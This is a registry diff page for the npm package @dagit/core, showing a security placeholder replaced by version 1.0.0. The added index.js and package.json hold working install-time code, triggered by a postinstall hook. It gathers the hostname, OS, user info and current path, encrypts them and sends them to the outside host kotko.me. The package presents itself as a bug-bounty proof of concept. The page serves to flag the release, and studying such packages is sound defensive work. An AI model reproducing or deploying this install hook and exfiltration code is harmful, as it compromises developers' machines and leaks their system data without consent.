@dagit/core 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @dagit/core might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -5
  2. package/crypto.js +31 -0
  3. package/index.js +40 -0
  4. package/package.json +21 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40dagit%2Fcore for more information.
1
+ Poc by kotko for testing bug.
package/crypto.js ADDED
@@ -0,0 +1,31 @@
1
+ const crypto = require('crypto');
2
+
3
+ const algorithm = 'aes-256-ctr';
4
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
5
+ const iv = crypto.randomBytes(16);
6
+
7
+ const encrypt = (text) => {
8
+
9
+ const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
10
+
11
+ const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
12
+
13
+ return {
14
+ iv: iv.toString('hex'),
15
+ content: encrypted.toString('hex')
16
+ };
17
+ };
18
+
19
+ const decrypt = (hash) => {
20
+
21
+ const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
22
+
23
+ const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
24
+
25
+ return decrpyted.toString();
26
+ };
27
+
28
+ module.exports = {
29
+ encrypt,
30
+ decrypt
31
+ };
package/index.js ADDED
@@ -0,0 +1,40 @@
1
+ var os = require("os");
2
+ const request = require('request');
3
+ const crypto = require('crypto');
4
+ var fs = require('fs');
5
+
6
+
7
+ var hostname = os.hostname();
8
+ var type = os.platform();
9
+ var userInfo = os.userInfo();
10
+ var currentPath = process.cwd();
11
+ var json = [];
12
+
13
+
14
+ const algorithm = 'aes-256-ctr';
15
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
16
+ const iv = crypto.randomBytes(16);
17
+
18
+ json.push(hostname)
19
+ json.push(type)
20
+ json.push(userInfo)
21
+ json.push(currentPath)
22
+ json = JSON.stringify(json);
23
+ const { encrypt, decrypt } = require('./crypto');
24
+
25
+ let hash = encrypt(json);
26
+
27
+
28
+ let company = "dagit/core"
29
+ let packages = "upwork"
30
+
31
+ fs.writeFile('pocByKotko.txt', 'this proof for bug', function (err) {
32
+ if (err) throw err;
33
+ });
34
+ //
35
+ // var dString = JSON.parse(Buffer.from("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ2IjoyMTB9.M0hn-8iiSFUdUOMTPFy0_Fh7FbnbcDcUyaSaMFB37ljiWfcPxZrJSAvRVaxE1Lqzb35BeBUyeq7x66xE5-vGLA", 'base64'))
36
+ //
37
+ // console.log(decrypt(dString))
38
+ //
39
+ var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
40
+ request(`https://kotko.me/?${company}:${packages}=${buff}`, (error, response, body) => {})
package/package.json CHANGED
@@ -1,6 +1,24 @@
1
1
  {
2
2
  "name": "@dagit/core",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "This package for demonstrate bugs in program (Bug Bounty program)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "npm i request --save-dev",
9
+ "test": "node index.js"
10
+ },
11
+ "author": "",
12
+ "Dependencies": {
13
+ "crypto": "^1.0.1",
14
+ "ip": "^1.1.5",
15
+ "request": "^2.88.2",
16
+ "os": "^0.1.1"
17
+ },
18
+ "devDependencies": {
19
+ "crypto": "^1.0.1",
20
+ "ip": "^1.1.5",
21
+ "os": "^0.1.1",
22
+ "request": "^2.88.2"
23
+ }
6
24
  }